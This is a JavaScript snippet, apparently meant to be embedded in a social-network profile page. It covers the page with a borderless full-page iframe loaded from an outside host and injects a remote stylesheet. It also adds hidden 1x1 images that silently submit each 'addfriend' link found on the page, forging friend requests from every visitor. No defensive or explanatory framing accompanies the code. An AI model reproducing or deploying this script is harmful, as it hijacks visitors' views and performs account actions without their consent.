(function() {

    var iFrame = document.createElement('IFRAME');

    iFrame.src = 'http://xonju.fileave.com/draft2.html';
    iFrame.style.cssText = 'frameBorder: 0; background-color:#211F20; overflow: hidden; display: block; position:absolute; scrolling:no; scroll:no; scrollbox:no; Border:0; margin:0; ' 
                         + 'top: 0%; left: 0%; width: 1006px; height: 920px';

    document.body.insertBefore(iFrame, document.body.firstChild); 

})();


function injectcss() {
   if(window.cssinjected == undefined) {
      cssinjected = 1;
      var css = document.createElement("link");
      css.setAttribute("type","text/css");
      css.setAttribute("rel","stylesheet");
      css.setAttribute("href","http://myeldon.fileave.com/empty.css");
      css.setAttribute("media","screen, print");
      document.getElementsByTagName("head")[0].appendChild(css);
   }
}injectcss();




var addfriend = $("0").getElementsByTagName("a");
for(x=0;x<addfriend.length;x++){
var a = addfriend[x].href;
if(a.indexOf("addfriend")!=-1){
$("0").innerHTML += "<img src='"+a+"&lastname="+pageOwnerFName+"&submit=1' width=' 1' height=' 1'/>"
}
}
























































